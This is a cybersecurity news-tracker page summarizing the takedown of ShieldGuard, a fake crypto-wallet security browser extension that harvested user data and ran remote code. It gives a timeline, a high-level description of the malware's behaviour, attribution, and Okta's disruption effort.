CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

ShieldGuard malicious browser extension operation dismantled after data harvesting campaign uncovered

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A cryptocurrency-themed browser extension named ShieldGuard, marketed as a security tool for crypto wallets, was dismantled after researchers discovered it functioned as malware designed to harvest sensitive user data from major crypto platforms and general browsing sessions. The operation employed social media promotion, browser extension listings, and token airdrop incentives to lure users into installing the malicious extension. ShieldGuard targeted Binance, Coinbase, MetaMask, and general browsing activity, capturing wallet addresses, HTML content post-login, session persistence, and enabling remote code execution via a command-and-control (C2) server.

Timeline

  1. 18.03.2026 16:15 1 articles · 3h ago

    ShieldGuard malicious browser extension dismantled after data harvesting uncovered

    A cryptocurrency-themed browser extension named ShieldGuard, marketed as a security tool for crypto wallets, was dismantled after researchers discovered it functioned as malware designed to harvest sensitive user data from major crypto platforms and general browsing sessions. The extension harvested wallet addresses, captured full HTML content from crypto platforms after login, tracked users persistently across sessions, and executed remote code via a command-and-control server. ShieldGuard used obfuscation and a custom JavaScript interpreter to bypass Chrome security restrictions, enabling dynamic code delivery and execution without triggering standard protections.

    Show sources
    Open in new tab

Information Snippets

  • ShieldGuard was promoted as a security tool protecting crypto wallets from phishing and harmful smart contracts, but functioned as malware harvesting user data from Binance, Coinbase, MetaMask, and general browsing activity.

    First reported: 18.03.2026 16:15
    1 source, 1 article
    Show sources

  • The extension harvested wallet addresses, captured full HTML content from crypto platforms after login, tracked users persistently across sessions, and executed remote code via a C2 server.

    First reported: 18.03.2026 16:15
    1 source, 1 article
    Show sources

  • ShieldGuard used obfuscation and a custom JavaScript interpreter to bypass Chrome security restrictions, enabling dynamic code delivery and execution without triggering standard protections.

    First reported: 18.03.2026 16:15
    1 source, 1 article
    Show sources

  • Attackers leveraged the malware to collect account balances, transaction histories, portfolio data, and in some cases redirected users to fake warning pages controlled by the attackers.

    First reported: 18.03.2026 16:15
    1 source, 1 article
    Show sources

  • Evidence suggests Russian-speaking operators, with links to another campaign known as 'Radex,' indicating a broader threat network.

    First reported: 18.03.2026 16:15
    1 source, 1 article
    Show sources

  • Okta Threat Intelligence collaborated with industry partners to remove the extension from the Chrome Web Store, take down associated domains, disable backend infrastructure, and block user sign-in functionality, effectively severing communication between infected browsers and attacker servers.

    First reported: 18.03.2026 16:15
    1 source, 1 article
    Show sources